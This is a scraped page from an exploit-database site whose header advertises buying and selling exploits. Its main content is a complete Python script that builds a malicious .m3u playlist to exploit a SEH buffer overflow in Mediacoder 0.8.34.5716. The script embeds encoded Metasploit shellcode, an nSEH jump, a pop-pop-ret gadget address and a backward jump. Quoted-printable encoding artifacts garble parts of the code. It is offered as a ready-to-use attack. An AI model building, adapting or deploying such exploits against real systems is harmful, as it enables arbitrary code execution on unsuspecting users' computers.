0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Mediacoder 0.8.34.5716 - (.m3u) Buffer Overflow SEH Exploit
#!/usr/bin/python # Exploit Title: Mediacoder 0.8.34.5716 Buffer Overflow SEH Exploit (.m3u) # Date: 05/May/2015 # Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan # email: kwiha2003 [at ]yahoo [dot] com=20 # Version: 0.8.34.5716 # Tested on: Win XP3 # Vendor: http://www.mediacoderhq.com/ # Software link: http://www.mediacoderhq.com/getfile.htm?site=3Dmediacoder.= info&file=3DMediaCoder-0.8.34.5716.exe # Greetz: b33f,corelan,offsec,vulnhub,HUST510 # Notes: Due to insifficient space after taking control of the EIP, you hav= e to jump backwards and also=20 # avoid a few bad bytes after the "A"s. #!/usr/bin/python buffersize =3D 853 buffer =3D ("http://" + "\x41" * 256) #Space for shellcode to decode buffer +=3D "\x90" * 24 # msfpayload windows/exec CMD=3Dcalc R|msfencode -b "\x00\x0a\x0d\x20" -t c= -e x86/shikata_ga_nai #[*] x86/shikata_ga_nai succeeded with size 223 (iteration=3D1) #unsigned char buf[] =3D=20 buffer +=3D("\xdd\xc1\xbd\xc4\x15\xfd\x3a\xd9\x74\x24\xf4\x5f\x29\xc9\xb1" "\x32\x31\x6f\x17\x03\x6f\x17\x83\x2b\xe9\x1f\xcf\x4f\xfa\x69" "\x30\xaf\xfb\x09\xb8\x4a\xca\x1b\xde\x1f\x7f\xac\x94\x4d\x8c" "\x47\xf8\x65\x07\x25\xd5\x8a\xa0\x80\x03\xa5\x31\x25\x8c\x69" "\xf1\x27\x70\x73\x26\x88\x49\xbc\x3b\xc9\x8e\xa0\xb4\x9b\x47" "\xaf\x67\x0c\xe3\xed\xbb\x2d\x23\x7a\x83\x55\x46\xbc\x70\xec" "\x49\xec\x29\x7b\x01\x14\x41\x23\xb2\x25\x86\x37\x8e\x6c\xa3" "\x8c\x64\x6f\x65\xdd\x85\x5e\x49\xb2\xbb\x6f\x44\xca\xfc\x57" "\xb7\xb9\xf6\xa4\x4a\xba\xcc\xd7\x90\x4f\xd1\x7f\x52\xf7\x31" "\x7e\xb7\x6e\xb1\x8c\x7c\xe4\x9d\x90\x83\x29\x96\xac\x08\xcc" "\x79\x25\x4a\xeb\x5d\x6e\x08\x92\xc4\xca\xff\xab\x17\xb2\xa0" "\x09\x53\x50\xb4\x28\x3e\x3e\x4b\xb8\x44\x07\x4b\xc2\x46\x27" "\x24\xf3\xcd\xa8\x33\x0c\x04\x8d\xcc\x46\x05\xa7\x44\x0f\xdf" "\xfa\x08\xb0\x35\x38\x35\x33\xbc\xc0\xc2\x2b\xb5\xc5\x8f\xeb" "\x25\xb7\x80\x99\x49\x64\xa0\x8b\x29\xeb\x32\x57\xae") buffer +=3D "\x42" * 350 nseh =3D "\xEB\x06\x90\x90" # 0x660104ee : pop edi # pop ebp # ret | [libiconv-2.dll]=20 seh=3D"\xee\x04\x01\x66" #Jump back 603 bytes due to insufficient space for shellcode jmpbck =3D "\xe9\xA5\xfd\xff\xff" junk =3D ("D" * 55)=20 f=3D open("exploit.m3u",'w') f.write(buffer + nseh + seh + jmpbck + junk) f.close() # 0day.today [2024-07-04] #